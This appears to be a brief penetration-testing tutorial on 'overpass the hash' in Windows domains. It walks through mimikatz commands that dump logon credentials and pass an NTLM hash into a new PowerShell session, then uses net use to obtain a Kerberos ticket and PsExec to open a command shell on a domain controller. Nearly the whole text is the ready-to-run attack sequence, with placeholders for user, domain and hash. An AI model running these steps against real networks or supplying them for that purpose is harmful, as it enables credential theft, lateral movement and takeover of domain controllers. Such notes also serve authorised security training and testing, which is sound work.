OverPass the hash

Overpass the hash

With overpass the hash, we can “over” abuse a NTLM user hash to gain a full Kerberos Ticket Granting Ticket (TGT) or service ticket, which grants us access to another machine or service as that user.

1. Transfer all 3 mimikatz file to run mimikatz.exe mimikatz.exe

2. Give privilege access privilege::debug

3. sekurlsa::logonpasswords Skip this step, if you already have hash

4. sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<ntlm hash> /run:PowerShell.exe At this point, we have a new PowerShell session that allows us to execute commands as <user>.

5. exit mimikatz

6. klist No Kerberos tickets have been cached, but this is expected since <user> has not performed an interactive login.

7. net use \\<dc_machine_name> However, let’s generate a TGT by authenticating to a network share on the domain controller or another service with net use:

8. klist

We have now converted our NTLM hash into a Kerberos TGT, allowing us to use any tools that rely on Kerberos authentication (as opposed to NTLM) such as the official PsExec application from Microsoft

1. .\PsExec.exe \\<dc_machine_name> cmd.exe

2. ipconfig to check

successfully reused the Kerberos TGT to launch a command shell on the domain controller.